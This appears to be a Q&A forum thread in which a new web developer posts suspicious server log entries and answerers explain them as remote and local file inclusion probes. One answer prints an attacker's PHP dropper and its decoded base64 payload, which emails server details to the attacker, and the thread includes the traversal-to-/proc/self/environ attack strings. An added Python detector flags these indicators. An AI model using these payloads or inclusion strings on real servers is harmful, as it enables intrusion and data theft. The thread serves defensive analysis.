Beginners security question

I'm still pretty new to web development, and have a question about security.

Every day I look at the "Latest Visitors" in my CPanel, and today there were some strange entries (one is pasted below).

Not knowing any better, it looks to me like there is some site that's referring users to my site, for some reason. Can someone explain what these really are, and if it's something to be concerned about? Thanks!

Host: 77.68.38.175

/?p=http://teen-37.net/myid.jpg?
    Http Code: 404  Date: Feb 17 08:13:58   Http Version: HTTP/1.1  Size in Bytes: -
    Referer: -
    Agent: libwww-perl/5.805   *  

/?p=../../../../../../../../../../../../../../../proc/self/environ%00
    Http Code: 404  Date: Feb 17 08:13:59   Http Version: HTTP/1.1  Size in Bytes: -
    Referer: -
    Agent: libwww-perl/5.805

Short answer:

Someone is attacking you.

Long answer:

Someone is using Perl scripts with the LWP module to act like a web browser and request strange URLs from your server to make it do something dangerous. This can be an automated attack, or someone doing it manually.

The second entry is trying to make your server include ../../../../../../../../../../../../../../../proc/self/environ in the website, which means "go to the parent directory a lot of times" (so it probably ends in the root directory) and show /proc/self/environ, which in Linux shows the environment variables of your process and can give some useful information to the attacker. UPDATE: It is not only getting information but also probing for a local file inclusion vulnerability, where you can run arbitrary code by putting PHP code in the User-Agent HTTP header and then including /proc/self/environ in the page. (Thanks to aaz for pointing it out.)

The first entry is even more interesting because it is apparently trying to make your server download the attacker's code and run it. This is what I just got when I downloaded http://teen-37.net/myid.jpg - it's not a JPEG image but a PHP script:

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "B"."a"."M"."b"."Y"."<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "[SAFEMOD:".$hsafemode."] [Kernel:".$xos."]";
echo "<center><A class=ria href=\"http://".$OS."\">";echo "B"."a"."M"."b"."Y</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("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"));
die("<center> ByroeNet </center>");
?>

The last part - eval(base64_decode("...")); - is clearly trying to hide what it's doing but you can decode it and you get this:

$creator = base64_decode("bXlpZHNjYW5AZ21haWwuY29t");
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

And now when you decode "bXlpZHNjYW5AZ21haWwuY29t" you get the email address.

We now know what someone was trying to make your server do - send email with some info about your server.

You now have the IP of the attacking server, which may or may not know that it is attacking - 77.68.38.175 seems to be server77-68-38-175.live-servers.net - the email address of the attacker, which must be used to collect data once in a while, and also the domain hosting the malicious code.

Search whois databases for teen-37.net (which is hosting the malicious code), the 77.68.38.175 IP address (which is attacking your server) and the 123.30.181.39 IP address (the IP of teen-37.net) for the contact info of the people responsible, so you can report abuse.

Also googling for teen-37.net and for some random parts of the malicious script might give you more interesting info.

Now, from the 404 response code we may assume that those two particular attacks didn't work, but you can't be sure, because theoretically when the attacker is controlling your server he can respond to himself with 404 after doing what he wanted to do.

Good luck.
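To turn the two log entries above into something you can check automatically, here is an added Python example (not from the question or any answer) that decodes each request path and flags the indicators discussed: a remote URL in the parameter, runs of ../, /proc/self/environ, a %00 null byte, and the libwww-perl user agent. The entries are reconstructed as a constructed list; the host, path and agent values are the ones quoted in the question.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the cPanel "Latest Visitors" entries
# from the question: (host, request path, user agent). The third line is a
# made-up benign request so the classifier has something to ignore.
SAMPLE_ENTRIES = [
    ("77.68.38.175", "/?p=http://teen-37.net/myid.jpg?", "libwww-perl/5.805"),
    ("77.68.38.175",
     "/?p=../../../../../../../../../../../../../../../proc/self/environ%00",
     "libwww-perl/5.805"),
    ("203.0.113.7", "/?p=about", "Mozilla/5.0 (X11; Linux x86_64)"),
]

REMOTE_URL = re.compile(r"=(?:https?|ftp)://", re.I)   # parameter points at another site
TRAVERSAL = re.compile(r"(?:\.\./){2,}")               # repeated parent-directory hops
SENSITIVE = re.compile(r"/proc/self/environ", re.I)    # the file probed in the question
SCANNER_UA = re.compile(r"^libwww-perl", re.I)         # weak on its own; LWP has legit uses


def classify_request(path, agent):
    """Return the list of indicator names that fire for one request."""
    decoded = unquote(path)  # %00 -> NUL byte, %2e%2e -> .. etc.
    hits = []
    if REMOTE_URL.search(decoded):
        hits.append("remote-file-inclusion")
    if TRAVERSAL.search(decoded):
        hits.append("path-traversal")
    if SENSITIVE.search(decoded):
        hits.append("sensitive-file")
    if "\x00" in decoded:
        hits.append("null-byte-truncation")
    if SCANNER_UA.search(agent):
        hits.append("scanner-user-agent")
    return hits


def summarize(entries):
    """Map each host with at least one hit to the sorted set of its indicators."""
    per_host = {}
    for host, path, agent in entries:
        hits = classify_request(path, agent)
        if hits:
            per_host.setdefault(host, set()).update(hits)
    return {host: sorted(names) for host, names in per_host.items()}


if __name__ == "__main__":
    for host, names in summarize(SAMPLE_ENTRIES).items():
        print(host, ", ".join(names))
```

A host that trips remote-file-inclusion or path-traversal is worth blocking at the firewall and reporting, while the user-agent match alone is only supporting evidence.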


In the first example someone is trying to include his own content in your site, which could be done if your $_GET['p'] did a naive include() or file_get_contents() call. The same goes for the second example, although that one is to retrieve information about the system's environment.


Nope. The "referer" field in both of your sample log entries is empty. In this case, either the user went straight to the site, or their browser simply did not provide the referer header that yields this information.

In this case the browser or "user-agent" involved is libwww-perl, so it seems that some tool written in Perl is making the requests.

From the second URL it looks like an attempt at a hack on your web server. This is very common on the internet, and as long as your web server is up to date you should not have any problems.


Looks like it's "someone" (probably just a script) probing for vulnerabilities. The first one looks like it's testing to see if it can get your site to perform arbitrary redirects or display arbitrary data and the second is trying to get your site to display arbitrary files on the file system.